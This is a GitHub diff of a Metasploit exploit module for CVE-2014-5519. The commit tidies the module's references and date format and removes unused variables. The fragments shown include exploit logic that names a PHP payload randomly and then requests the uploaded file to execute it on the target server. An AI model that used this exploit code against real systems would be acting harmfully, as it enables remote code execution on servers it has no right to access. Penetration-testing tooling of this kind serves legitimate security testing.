File tree Expand file tree Collapse file tree 1 file changed +3
-4
lines changed
modules/exploits/multi/http Expand file tree Collapse file tree 1 file changed +3
-4
lines changed Original file line number Diff line number Diff line change @@ -27,7 +27,7 @@ def initialize(info = {})
27
27
[
28
28
[ 'CVE' , '2014-5519' ] ,
29
29
[ 'OSVDB' , '110576' ] ,
30
- [ 'URL ' , 'http://www.exploit-db.com/exploits/ 34451/ ' ]
30
+ [ 'EDB ' , '34451' ]
31
31
] ,
32
32
'Payload' =>
33
33
{
@@ -41,7 +41,7 @@ def initialize(info = {})
41
41
[ 'Linux x86' , { 'Arch' => ARCH_X86 , 'Platform' => 'linux' } ]
42
42
] ,
43
43
'DefaultTarget' => 0 ,
44
- 'DisclosureDate' => 'Sept 11 2014' ) )
44
+ 'DisclosureDate' => 'Sep 11 2014' ) )
45
45
46
46
register_options (
47
47
[
@@ -51,7 +51,6 @@ def initialize(info = {})
51
51
52
52
def exploit
53
53
uri = target_uri . path
54
- peer = "#{ rhost } :#{ rport } "
55
54
56
55
payload_name = "#{ rand_text_alpha ( 8 ) } .php"
57
56
php_payload = get_write_exec_payload ( :unlink_self => true )
@@ -74,7 +73,7 @@ def exploit
74
73
75
74
upload_uri = normalize_uri ( uri + "/" + payload_name )
76
75
print_status ( "#{ peer } - Executing payload #{ payload_name } " )
77
- res = send_request_raw ( {
76
+ send_request_raw ( {
78
77
'uri' => upload_uri ,
79
78
'method' => 'GET'
80
79
} )
You can’t perform that action at this time.
0 commit comments